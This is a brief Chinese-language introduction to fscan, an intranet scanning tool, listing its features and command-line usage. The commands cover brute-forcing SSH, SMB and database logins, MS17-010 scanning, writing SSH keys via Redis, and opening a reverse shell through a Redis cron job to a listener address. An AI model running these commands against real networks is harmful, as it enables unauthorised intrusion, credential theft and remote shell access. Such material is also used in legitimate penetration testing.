fscan簡介
一款內網綜合掃描工具,方便一鍵自動化、全方位漏掃掃描。
支持主機存活探測、端口掃描、常見服務的爆破、ms17010、redis批量寫公鑰、計划任務反彈shell、讀取win網卡信息、web指紋識別、web漏洞掃描、netbios探測、域控識別等功能
主要功能
1.信息搜集:
- 存活探測(icmp)
- 端口掃描
2.爆破功能:
- 各類服務爆破(ssh、smb等)
- 數據庫密碼爆破(mysql、mssql、redis、psql等)
3.系統信息、漏洞掃描:
- netbios探測、域控識別
- 獲取目標網卡信息
- 高危漏洞掃描(ms17010等)
4.Web探測功能:
- webtitle探測
- web指紋識別(常見cms、oa框架等)
- web漏洞掃描(weblogic、st2等,支持xray的poc)
5.漏洞利用:
- redis寫公鑰或寫計划任務
- ssh命令執行
6.其他功能:
- 文件保存
usege
簡單用法
fscan.exe -h 192.168.1.1/24 (默認使用全部模塊)
fscan.exe -h 192.168.1.1/16 (B段掃描)
其他用法
fscan.exe -h 192.168.1.1/24 -np -no -nopoc(跳過存活檢測 、不保存文件、跳過web poc掃描) fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 寫公鑰) fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 計划任務反彈shell) fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功后,命令執行) fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模塊ssh和端口) fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (加載指定文件的用戶名、密碼來進行爆破) fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (指定掃描結果保存路徑,默認保存在當前路徑) fscan.exe -h 192.168.1.1/8 (A段的192.x.x.1和192.x.x.254,方便快速查看網段信息 ) fscan.exe -h 192.168.1.1/24 -m smb -pwd password (smb密碼碰撞) fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模塊) fscan.exe -hf ip.txt (以文件導入) fscan.exe -u http://baidu.com -proxy 8080 (掃描單個url,並設置http代理 http://127.0.0.1:8080)
牛就完了!
隨便傻瓜式掃一下內網
官方文檔以及fscan下載鏈接 https://github.com/shadow1ng/fscan